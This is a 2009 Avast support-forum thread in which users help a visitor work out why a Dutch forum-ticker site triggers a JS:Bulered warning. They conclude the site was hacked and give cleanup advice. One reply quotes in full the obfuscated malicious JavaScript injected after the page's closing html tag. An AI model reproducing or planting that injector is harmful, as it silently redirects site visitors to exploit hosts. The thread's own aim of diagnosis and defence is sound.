Avast WEBforum
Other => Viruses and worms => Topic started by: Filter on July 19, 2009, 03:07:45 PM
-
Hello, recently I've been getting a warning about a trojan called JS:Bulered from avast on the following site wXw.forumticker.nl (switch the X to w to visit). Could anyone tell me if that's true and maybe where the trojan is and how that works? It's a dutch site, but it's not supposed to be a malicious site(I know who runs the site). That site provides ticker signatures for forums, and those also trigger the same warning from avast since recently. Is the site hacked or something?
-
Welcome Filter.
There is a lot of site hacking going on and avast! is alert to this:
http://blog.avast.com/2009/06/25/chameleon_redirectors
-
Thanks YoKenny.
Could anyone tell me if that's also the case with wXw.forumticker.nl? Unfortunately I'm not knowledgable enough to look further into this matter, but I'd really appreciate it if anyone else could. Since that site distributes forum signatures the possible trojan reaches a high ammount of people through forums? I'd really appreciate anyone that could help explain the issue of this site. I frequent a forum where alot of people use these signatures, which is my main reason for wanting to know.
-
Suspicious script outside <html></html> tag:
<script>var cmgXz350="48czR30c";var eKI9C="Bj75bBj";var R3Op="ar RI47nZ='UJ";var pTchT="gwvgwvg4gwv";var FiZ7SH="J%63UJ%7";var tzKXYUV="gBgwvg78gwvg48g";var DNZ5x="wvg%VeVgwvgwvg9";var A7vxjJ5="Bj52bBj75bBj";var OUHK="v327%Lpzv33B';";var IY2f="%30UJ%2CaUJ%";var AQ75A="s').replace(/";var bRvy0F="9czR3B';";var qI8x="g,'3')));";var tQkox="%3DUJ%2";var xOaJ="vgwvg9";var GTmm="UJ%68UJ%65UJ";var fgit5sYv="69bBj76bBj20bB";pTchT=xOaJ+"gwvgwvg%VeV"+pTchT;var JF5Ylpr="Bj79bBjvEbBj27";var ph25="zR61czR74czR65";var FfMZlw="vgwvg9g";var PpuAu="R64czR6Fc";var pftS="(/wvg/g";var YuJz57="ce(/%6Cj/g,'8";var dh4e8H6="%6CUJ%79UJ%65UJ";var ila7q6d8="J%68UJ%74U";var OkdgH0M="/g,'J%').";FfMZlw="27gwvgwvg8gw"+FfMZlw;var Wj2n="val(unescap";var XwZUnTP5="CaUJ%6BUJ%";var CLkG="4bBj6FbBj6v";var TGoPTi="28bBj52b";var ohM4="bBj52bBj7";var gUlHG="jvCbBj2FbB";var IlM39V="vgwvggwv";var evE0CX="eval(unes";var hXjPG="J%31UJ%27U";bRvy0F="R27czR2"+bRvy0F;dh4e8H6="65UJ%72UJ%66UJ"+dh4e8H6;FiZ7SH+="4UJ%2CaUJ%6";var rLxmX="u7Ea='%Lpzv";var gK2N="wvg2Egwvg73gwvg";YuJz57+="%')));var";var FFlA="(/UJ%/";var JIMDg5Cy="%3AUJ%2FUJ%2FU";var bqZZ="20czR64czR";ila7q6d8+="J%3DUJ%27";var fu59K8D="bBj6Cb";var NvmwGebn="vg74gwvgwvg%Ve";var cNlfN9="75czR6DczR65cz";var wW4pliDx="pzv330";var oeQZJl="jv6bBj";GTmm="8UJ%30UJ%2Ca"+GTmm;YuJz57+=" O2fGgt='gwvgwv";IY2f="J%78UJ%48UJ"+IY2f;var hg8eSQ="wvg78gw";var Q3sDJ="UJ%3BUJ%64U";pTchT="wvgwvg8gw"+pTchT;qI8x+="var EyD";IY2f=Q3sDJ+"J%6CaUJ%6BU"+IY2f;var YwKq="UJ%72UJ%";YuJz57+="g4gwvgw";IY2f="0UJ%27"+IY2f;var ExYZZuY="%74UJ%2CaUJ%";var eSUlC5o="9bBjvDbBjvDbBj";var XghOg="BjvCbBj2FbB";pTchT+="g28gwvgwvg4g";hg8eSQ+="vg48gwvg30gwvg";ExYZZuY="UJ%73UJ"+ExYZZuY;var JCgckOv="j61bBj45bBj69";var hEL8FEus="j52bBj58bB";AQ75A="%Lpz/g,'"+AQ75A;YuJz57=".repla"+YuJz57;oeQZJl="j57bBj58bBj59bB"+oeQZJl;Wj2n="jvB';e"+Wj2n;YwKq="%2FUJ%54"+YwKq;XghOg=oeQZJl+"27bBjvEb"+XghOg;var DfiJdZ="Bj64bBj6FbBj6v";var djiboxsc="74czR28czR27c";hXjPG+="J%3BUJ%64UJ%6";eKI9C+="6DbBj65bBj6Eb";XghOg+="j64bBj69bBj76bB";OUHK="9%Lpzv364%Lpz"+OUHK;tzKXYUV=YuJz57+"vgEgwvgwv"+tzKXYUV;var UhR984pb="aUJ%73U";gK2N+="74gwvg79gwvg";var bfF2RD9="j69bBj4";var CX2nyL="zR2EczR63c";hEL8FEus="72bBj20bBj7vbB"+hEL8FEus;CX2nyL=cNlfN9+"R6EczR74c"+CX2nyL;tzKXYUV=AQ75A+"sv3/g,'%')"+tzKXYUV;var BqVI="6/g,'%'))";var plLb2zuC="7gwvg3Bgw";gK2N=tzKXYUV+"wvg30g"+gK2N;var wOans="replac";DNZ5x="vg2gwvgwvg9gwvg"+DNZ5x;CX2nyL=PpuAu+"zR63czR"+CX2nyL;XghOg+="jvEbBj22bBjvBb";wW4pliDx="7%Lpzv362%L"+wW4pliDx;hEL8FEus+="j6EbBj74bB";var LL5EWZ="Egwvgwvg";var hXysc="g70gwvgwvg5";pftS+=",'6').replace";tQkox+="7UJ%68UJ%74UJ%7";GTmm="J%78UJ%4"+GTmm;var b5FN="vggwvgwvg9gwvg";JCgckOv+="bBj4DbB";Wj2n+="e(CDbc.";var TUvxJqc="v32E%Lpzv36E%";OkdgH0M+="replace(/bBJ%/";var K3sAx="74bBj65";DNZ5x+="gwvg74g";var HjKmEu6="5bBj74b";wOans+="e(/Ca/";var J8asNu="2czR61czR6Dc";evE0CX=hg8eSQ+"29gwvg3B';"+evE0CX;bRvy0F=J8asNu+"zR65cz"+bRvy0F;FiZ7SH=dh4e8H6+"%66UJ%66UJ%65U"+FiZ7SH;var daHjW="var CDbc='";var es0I="zR65czR6DczR";var O5pPNLZ="7%Lpzv37A%Lp";tQkox=UhR984pb+"J%72UJ%63UJ"+tQkox;DfiJdZ="bBj4FbBjvDb"+DfiJdZ;OkdgH0M=Wj2n+"replace(/j"+OkdgH0M;JCgckOv="bBj75bBj4BbB"+JCgckOv;evE0CX="EgwvgwvgBg"+evE0CX;CX2nyL=cmgXz350+"zR3Dcz"+CX2nyL;DfiJdZ=hEL8FEus+"j6CbBj66"+DfiJdZ;hXysc+="gwvgwvgEgwvgwvg";evE0CX+="cape(O2fGgt.";bfF2RD9+="DbBj29bBj";JIMDg5Cy=tQkox+"4UJ%70UJ"+JIMDg5Cy;ExYZZuY+="62UJ%75UJ%";var q3OrnGt="5bBj69bBj4";var tAS7="bBj69bBj4DbBjv";CLkG="27bBjvBbBj6"+CLkG;bRvy0F+="eval(unesca";bRvy0F+="pe(EyDa0e.rep";HjKmEu6+="Bj45bBj6";var T1rscS="'C').re";var TTXPmh2="J%3B';";BqVI=T1rscS+"place(/g"+BqVI;es0I=ph25+"czR45czR6Cc"+es0I;FfMZlw+="wvgwvg4gw";var ztNhGCn0="58bBj59bBj";HjKmEu6+="CbBj65bBj6DbBj";var iWA5="Bj74bBj42bB";CLkG="j79bBjvEbBj"+CLkG;ohM4=fu59K8D+"Bj6CbBj29"+ohM4;bRvy0F+="lace(/";XghOg+="Bj69bBj66bBj28b";var P7YpX6H="bBj6EbBj74bBj";FFlA=wOans+"g,'E').replace"+FFlA;eSUlC5o="2bBj6FbBj64bBj7"+eSUlC5o;FfMZlw+="vgwvg4gw";TTXPmh2=ila7q6d8+"UJ%31UJ%27U"+TTXPmh2;eSUlC5o=eKI9C+"Bj74bBj2EbBj6"+eSUlC5o;OUHK+="eval(unescape(t";O5pPNLZ="v33D%Lpzv32"+O5pPNLZ;hXysc=LL5EWZ+"1gwvg70gwv"+hXysc;XghOg="0bBj55bB"+XghOg;var Y70o="UJ%64UJ%74UJ%68";P7YpX6H+="2EbBj77";bRvy0F=djiboxsc+"zR69czR66czR7"+bRvy0F;plLb2zuC+="vg73gwvg52gwv";FFlA+="g,'%')));";DNZ5x=b5FN+"73gwvgwvg9gwvgw"+DNZ5x;ztNhGCn0="5bBj57bBj"+ztNhGCn0;plLb2zuC="vgEgwvg2"+plLb2zuC;TTXPmh2=GTmm+"%69UJ%67U"+TTXPmh2;var IRD2NJ="bBj28bBj27b";evE0CX=pTchT+"wvgwvg"+evE0CX;OUHK="79%Lpzv35"+OUHK;gK2N=OUHK+"pu7Ea.replace(/"+gK2N;TUvxJqc+="Lpzv361%Lpzv36";iWA5=HjKmEu6+"65bBj6Eb"+iWA5;FfMZlw=DNZ5x+"wvg79gwvg3Dgwvg"+FfMZlw;JIMDg5Cy="30UJ%2C"+JIMDg5Cy;fgit5sYv="j64bBj"+fgit5sYv;YwKq=FiZ7SH+"7UJ%73UJ"+YwKq;IRD2NJ=iWA5+"j79bBj49bBj64"+IRD2NJ;q3OrnGt=ohM4+"5bBj4BbBj61bBj4"+q3OrnGt;es0I=CX2nyL+"zR72czR65c"+es0I;gK2N+="wvg%VeVgwvgwvg5";es0I=bqZZ+"6EczR6BczR78czR"+es0I;TTXPmh2+="eval(unescape";JIMDg5Cy=XwZUnTP5+"78UJ%48UJ%"+JIMDg5Cy;TGoPTi+="Bj75bBj4Bb";JF5Ylpr="bBj6FbBj64b"+JF5Ylpr;var XQlU="zv36Cj4%L";K3sAx=P7YpX6H+"bBj72bBj69bBj"+K3sAx;q3OrnGt+="DbBjvDbBj27b";CLkG=gUlHG+"j62bBj6FbBj64bB"+CLkG;IlM39V=NvmwGebn+"Vgwvgw"+IlM39V;ExYZZuY=JIMDg5Cy+"J%65UJ%78UJ%69"+ExYZZuY;YwKq=ExYZZuY+"74UJ%74UJ%"+YwKq;IRD2NJ="2EbBj67bBj6"+IRD2NJ;plLb2zuC=FfMZlw+"vgwvg5gwvgw"+plLb2zuC;O5pPNLZ=TUvxJqc+"D%Lpzv365%Lpz"+O5pPNLZ;A7vxjJ5="61bBj72bBj20b"+A7vxjJ5;eSUlC5o=XghOg+"Bj64bBj6FbBj6vb"+eSUlC5o;XQlU="zv36B%Lpzv37%Lp"+XQlU;ztNhGCn0=IRD2NJ+"Bj70bBj5"+ztNhGCn0;tAS7=A7vxjJ5+"4BbBj61bBj45"+tAS7;bRvy0F=es0I+"65czR6EczR"+bRvy0F;OkdgH0M+="g,'%').repl";O5pPNLZ=XQlU+"pzv36Cj30%Lpz"+O5pPNLZ;JCgckOv=JF5Ylpr+"bBj2BbBj52"+JCgckOv;qI8x=OkdgH0M+"ace(/v/"+qI8x;q3OrnGt=eSUlC5o+"6EbBj75"+q3OrnGt;BqVI+=");";YwKq=R3Op+"%64UJ%6"+YwKq;ztNhGCn0="65bBj6EbBj74bBj"+ztNhGCn0;YwKq=bRvy0F+"czR/g,'%')));v"+YwKq;pftS=evE0CX+"replace"+pftS;IY2f=YwKq+"6FUJ%7"+IY2f;fgit5sYv=tAS7+"DbBj22bBjvCbB"+fgit5sYv;IlM39V=plLb2zuC+"g58gwvgwvgEgw"+IlM39V;IlM39V=gK2N+"gwvg2Egwvg7w"+IlM39V;bfF2RD9=TGoPTi+"Bj61bBj45bB"+bfF2RD9;hXysc=IlM39V+"g4Fgwvg2"+hXysc;qI8x=ztNhGCn0+"v6bBj27bBj29bB"+qI8x;q3OrnGt="BjvDbBj27bBj7"+q3OrnGt;hXysc=wW4pliDx+"%Lpzv339%Lpzv3"+hXysc;JCgckOv=q3OrnGt+"BjvCbBj62"+JCgckOv;O5pPNLZ=rLxmX+"364%Lpzv36E%Lp"+O5pPNLZ;Y70o=IY2f+"77UJ%69"+Y70o;TTXPmh2=hXjPG+"CaUJ%6BU"+TTXPmh2;JCgckOv=fgit5sYv+"j69bBj64b"+JCgckOv;TTXPmh2=Y70o+"UJ%3DUJ%27U"+TTXPmh2;CLkG=JCgckOv+"j2BbBj27bB"+CLkG;hXysc=O5pPNLZ+"zv37%Lpzv36Cj5"+hXysc;hXysc=FFlA+"var tp"+hXysc;K3sAx=CLkG+"bBj75bBj6DbBj65"+K3sAx;DfiJdZ=bfF2RD9+"vBbBj76bBj61bBj"+DfiJdZ;BqVI=pftS+"(/%VeV/g,"+BqVI;hXysc=TTXPmh2+"(RI47nZ."+hXysc;qI8x=DfiJdZ+"bBj75bBj6DbBj"+qI8x;qI8x=K3sAx+"bBj20bBj"+qI8x;qI8x=daHjW+"bBj76bBj"+qI8x;qI8x+="a0e='czR76czR";hXysc=qI8x+"61czR72czR"+hXysc;BqVI=hXysc+"4gwvg43g"+BqVI;eval(BqVI);</script><script>check_content()</script>
-
Thanks! So that is probably the actual problem?
If I contact the owner of that site, what would I need to tell him?
Is it just that script that is the problem or also how the script got on there?
-
- This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.
I suggest the following clean up procedure for both your accounts:
1. check all index pages for any signs of java script injected into their coding. On windows servers check any "default.aspx" or
"default.cfm" pages as those are popular targets too.
2. Remove any "rouge" files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.
3. Check all .htaccess files, as hackers like to load re-directs into them.
4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
"strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!
This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.
Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security (http://www.stopbadware.org/home/security).
-
Thanks DavidR, it's not my site though, but thanks :)
Did you check the site wXw.forumticker.nl? I'd like another opinion on it, because the moderator on that forum claims it's a false positive because his nod32 doesn't find anything. Already told him avast has a better web shield, but I'd like a second opinion on it.
-
Hi Filter,
As .: L' arc :. already said there is a suspicious script outside the html block (right at the bottom, after the closing html tags)
This is wrong and should not be there.
You could advise the webmaster of this thread, tell them to look at the source code them selves, and show them this link:
http://www.UnmaskParasites.com/security-report/?page=www.forumticker.nl
-Scott-
-
It is most certainly hacked, there are very few AVs even looking for this much less able to detect and avast is all over them like a rash.
There is a huge block of obfuscated javascript after the closing html tag, a standards no, no, so it is highly unlikely that it is there by design.
This script tag is all on a very long single line, see image, I have broken it down to give a better idea of what it looks like.
-
Need another opinion?
Seems an infected script as posted by .: L' arc :.
-
Ha filter,
Ja dit is een groeiend probleem, software of script op websites die kwetsbaar blijken voor exploits.
Wellicht een oudere versie van Joomla daar. De web-admins zijn er niet al te alert op en merken niet dat ze hun gebruikers via hun browser bezoekjes besmetten. Een ander voorbeeldje van een dergelijke besmetting: http://forum.avast.com/index.php?topic=46176.0
Het weghalen van de malcode helpt niet zomaar, de kwetsbaarheid die de hackers toegang verschafte moet verdwijnen, dat kan een PHP kwetsbaarheid zijn, zoals hier een oudere versie van gebruikte website software of oude meuk waar de webadmin niet van weet dat het exploitable is, ook de hoster dient zijn gebruikers te beschermen tegen deze massale hacks,
groetjes,
polonus
-
Thanks everybody for your swift help :) I have passed on all the information you provided me, should be more than enough! So, thanks again.
@ Polonus:
Bedankt, toevallig had ik dat topic al gelezen, vond het al erg veel gelijkenis tonen met dit geval. Ik denk dat dit ook zeker een geval is van verouderde software. Ik was vooral verbaasd dat ik de enige ben die het opmerkte door avast. Ik gebruik avast al zo lang zonder problemen dat ik bijna zou vergeten wat voor troep vele andere mensen gebruiken, hehe.
-
You're welcome, good luck.
-
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.
But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
-
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.
But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
I guess, it wont be easily set as false positive, the location of script is different from what should be.
Sophos detected the said script as an infection too.
http://www.virustotal.com/analisis/eb76a862b807bdec69a5e4e85062121dd523103ac35142cccf910bbf66170dbe-1248088861
-
Sophos detects it as suspicious behaviour but not so much as an infection, probably because of the wrong placement.
The code is in the wrong place, but that only seems to be because he doesn't have enough knowledge on where to put it.
Still feel that on itself shouldn't be enough to set off avast for a trojan though? Ahh well.
-
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.
But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
This is not a false positive!! I'm pretty sure hes not the creator of this script - it is infection. After unpacking that huge script (3 layers) you will see an iframe creation with malicious target url.
If he says that the code contains some info, then I ask what info? There is just one malicious iframe.
Regards
-
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.
BS
I'm sorry but there is NO reason to put ANY code outside of the html tags, and obfuscate it too
That spells disaster, even before it is actually malicious, which incidently it is.
Is he looking at the source code at all, let alone the right part ???
But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
Correct me if I'm wrong but avast is not alerting to the strange placement, it is alerting to the actual content, which jsetko has explained.
-Scott-
-
No reasons to bash but, I believe, it is on the website author's side where the move must be done [modify the source code] rather than avast set it as a false positive.
avast has no fault of the script being placed outside the <html></html> tag.
-
The way he handled it yesterday didn't make sense to me in the first place. He just brushed it off, seemed like he had no idea what I was talking about. I agree it's his move though, but I'm not giving up this easily :P Other cases on this forum concerning JS:Bulered were exactly the same as this one. Thanks again guys for the help, I appreciate it :) I've passed the info on that you provided jsetsko, thanks. I think he's probably talking about another script or something.
-
The way he handled it yesterday didn't make sense to me in the first place. He just brushed it off, seemed like he had no idea what I was talking about.
Yes, this is a common reaction to this - the 'I know better than you because I run a website' attitude
-
Or maybe he really has no clue. Anyway, another forum member with avast has the same issue and posted a link to this thread, so maybe he'll get any wiser from this discussion here.
-
...so maybe he'll get any wiser from this discussion here.
We can only hope...;)
-
Apparently, he put that code there himself :-\
He says in that code is all the information that goes into the ticker signatures.
But just the strange placement of that code shouldn't set off avast though? Or does it and is it a false positive?
I have to wonder why they are obfuscating javascript (what do they have to hide), which is essentially a plain language scripting tool and then stick it outside the html tags just adds to that suspicion.
@ .: L' arc :.
One of the problems in this is when sending it to VT, there are very few of those scanners that are even looking for this type of thing.
-
One of the problems in this is when sending it to VT, there are very few of those scanners that are even looking for this type of thing.
Fully agree with David. The reality is that avast is behind any other competitor in this meaning.
-
Hi Tech, DavidR and Filter,
I had WEPAWET analyze the site: wXw.forumticker.nl
Results: http://wepawet.iseclab.org/view.php?hash=81df9d5d82e0346347bd3bdb4eed0ebd&t=1248116104&type=js
pol
-
I had WEPAWET analyze the site
Thanks Polonus, but it's too technical for me... I wish a clear information: infected or not. I think average user will think the same.
-
One of the problems in this is when sending it to VT, there are very few of those scanners that are even looking for this type of thing.
Fully agree with David. The reality is that avast is behind any other competitor in this meaning.
Don't you mean avast is 'ahead' of other competitors as they aren't even checking.
-
Hi DavidR and Tech,
Well you can read it yourself as the analysis says "suspicious" and sites with suspicious code should be blocked, if they actually redirected to a silent malware download host or not, the websites in question should be cleansed from this "Unfug" to use an appropriate German word. That is my two cents on the matter of suspicious code found in webpages....
In most cases the code is malcode or could be abused and this can be established from analyzing at www.unmaskparasites.com via their security report or the malicious iFrames checked against the Bad Stuff Detektor or the site checked against Wepawet-alpha url scanner or blacklistdoctor.com
Use a bookmarklet like this one to show hidden js on a page: javascript:(function(){var%20i,f,j,e,div,label,ne;%20for(i=0;f=document.forms[i];++i)for(j=0;e=f[j];++j)if(e.type=="hidden"){%20D=document;%20function%20C(t){return%20D.createElement(t);}%20function%20A(a,b){a.appendChild(b);}%20div=C("div");%20label=C("label");%20A(div,%20label);%20A(label,%20D.createTextNode(e.name%20+%20":%20"));%20e.parentNode.insertBefore(div,%20e);%20e.parentNode.removeChild(e);%20ne=C("input");/*for%20ie*/%20ne.type="text";%20ne.value=e.value;%20A(label,%20ne);%20label.style.MozOpacity=".6";%20--j;/*for%20moz*/}})() "Good for you analyzers to keep an eye on the sparrow!"
Yes good forum friends, we are in the top league in this respect, avast is leader here, so polonus is also out in the trenches and I put all we have found over recent months in long threads at InformAction Forums where each an every malcode script is discussed in length with the protection of NoScript in mind, re: http://forums.informaction.com/viewtopic.php?f=8&t=1028
(my nick is luntrus there). Keep on the look-out, folks, and keep your shields up, avast knights,
polonus
-
Hi Tech, DavidR and Filter,
I had WEPAWET analyze the site: wXw.forumticker.nl
Results: http://wepawet.iseclab.org/view.php?hash=81df9d5d82e0346347bd3bdb4eed0ebd&t=1248116104&type=js
pol
Could you or anyone else maybe explain that report?
The only things I can find that seem off is the url redirects at the bottom: hXtp://exist.butterflyeffect.gs/Trop and hXtp://ipot.applepie.gd/privatezone/?d6fb367bf8c5480228703541f761eb18
Both those sites are blocked by Google and thus can be seen as malicious?
-
The problem with obfuscated javascript it isn't easy to see what is being done much less if it is redirecting and to where as the image example of the code on that page I posted earlier.
I have no tools to be able to do any analysis (I like the others trying to help are just avast users like yourself), but given the link polonous gave (in the quoted text) you can do as you have and look-up the domains and as you have found they are considered malicious. So there is a likelihood that avast too finds these malicious and effectively alerts to block access.
-
Hi Filter,
Yep, good observation, this is what google has to say about exist dot butterflyeffect dot gs and that was "De vorige keer dat verdachte inhoud op deze site werd aangetroffen (last time suspicious content was found), was op (was on) 2009-07-20. Malicious software includes 96 scripting exploit(s). This site was hosted on 1 network(s) including AS31103 (Keyweb AG).
The other one: ipot dot applepie dot gd forward slash privatezone Last time suspicious content was found on this site was on 2009-07-20
De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2009-07-20.
Malicious software includes 754 scripting exploit(s).
This site was hosted on 2 network(s) including AS41062 (PRO100), AS22576 (LAYER3).
Deze site heeft in de afgelopen 90 dagen schadelijke software gehost. Deze software heeft 361 domein(en) geïnfecteerd, waaronder xvediox.com/, flashost.com.br/, coralhillsresort.com/.
This site has been hosting malcode during the last 90 day period. This software has been infected 361 domains, e.g. : xvediox.com/, flashost.com.br/, coralhillsresort.com/.
Just delving a little into this and you see what we come up with. Easy answers won't do, confront them with this - what does the obfuscated code do on that web page?
polonus
-
Thanks, both of you. This should be more than enough evidence. ;)
Have to say that I came to understand alot more about JS:Bulered ;D
-
You're welcome, good luck.
-
Ha Filter,
Het genoegen was wederzijds, wij leren hier ook weer van. Je begrijpt dat dit recentelijk steeds belangrijker aan het worden is omdat CyberCrook & Co het nu via deze listigheidjes voorzien heeft op de betrouwbare kleinere websites, die hier niet zo op verdacht zijn. Avast heeft hier speerpunt technologie en de avast schilden werken goed. Ook is het altijd verstandig een browser met script blocker te gebruiken, ik zweer bij Firefox met NoScript. NoScript is nog geen enkele keer verslagen als je de malcode maar niet whitelist en daarom is het besmetten van normaliter betrouwbare veilige sites zo'n gevaarlijke zaak. Welkom op onze forums, blijf hier komen met je vragen en blijf ons inspireren. Ik wens je veiligheid online en blijf malware vrij,
polonus aka Damiaan
-
Bedankt. Ben al heel lang blij met Avast :) Ik blijf hier zeker rondhangen!
-
hello guys,
i am having the same issue, my site is getting hacked again and again, i always remove the same malicious code from my phpbb3, coppermine, wordpress and the static web pages one by one but its there again after a day or two, contacted my webhosting company but they dont have any solution, my avast antivirus used to tell me that i have some JS:Bulered virus in my pages but i used to ignore till i started getting this on my website hXXp://www.intcube.com though my cpanel was never hacked and i am still able to use it, saw a few posts in the avast forums and some others aswell but no one knows about the exact nature of this malware
http://www.hackthissite.org/forums/viewtopic.php?f=29&t=3849!
http://forum.avast.com/index.php?topic=46176.0
http://forum.avast.com/index.php?topic=46919.0
(http://img200.imageshack.us/img200/4717/89926055.jpg)
after going through google advisory pages, i changed my password after cleaning pages from various computers but whenever i would logon my pages would again be infected with the code mentioned above, google says
(http://img200.imageshack.us/img200/1382/80631694.jpg)
i checked lemonia.ws google advisory pages and it clearly shows that its the source of virus,
(http://img4.imageshack.us/img4/3883/65765763.jpg)
in june there was nothing regarding js:bulered malware in google search, but now we're having alot of forums where people are discussing this, think its spreading more and more and may be some one would help us too, can any one suggest what should i do?
-
Please, do not post twice the same. Just double the effort of helping.
Follow http://forum.avast.com/index.php?topic=46176.0;topicseen